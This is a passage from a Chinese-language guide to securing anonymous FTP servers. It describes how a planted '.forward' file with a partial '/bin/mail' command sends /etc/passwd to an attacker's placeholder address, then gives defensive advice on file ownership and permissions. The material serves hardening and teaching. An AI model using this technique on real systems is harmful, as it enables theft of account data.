[摘要]/bin/mail me@my.e-mail.addr", 实际上对重定向过来的作为输入的邮件内容没有做任何处理, 而是把/etc/passwd(为了防止被安全机制过滤, 先在每一行行首增...
/bin/mail me@my.e-mail.addr", 实际上对重定向过来的作为输入的邮件内容没有做任何处理, 而是把/etc/passwd(为了防止被安全机制过滤, 先在每一行行首增加一个空格)发到了攻击者的电子邮件地址(me@my.e-mail.addr)。 因此, 在投放了这样一个".forward"文件后, 再随便发一封电子邮件给victim.com上的FTP用户, 通过"转发"功能, ngcc.com上的/etc/passwd文件就寄到攻击者的电子邮件地址上。
(10)其他文件和目录
确保没有其他文件和目录被FTP用户或所在的组拥有所有权(ownered by ftp account and ftp group);否则, 黑客可能借助特洛伊木马程序对合法文件进行替代, 构成漏洞隐患。
除了~/ftp/incoming目录外, 匿名(anonymous)FTP 用户在其他目录下不能创建任何文件和子目录。
文件和目录权限修改要慎重:对于系统或CERT组织推荐的有关特定文件的读写权限, 如/var/adm/utmpx和/var/adm/wtmpx文件权限应该为644, 不要轻易修改。 一般情况下, 拥有对任何文件和目录具有写权限的用户只能是超级用户, 进一步说, 如果一个文件或目录可写, 则可写者只能为超级用户
……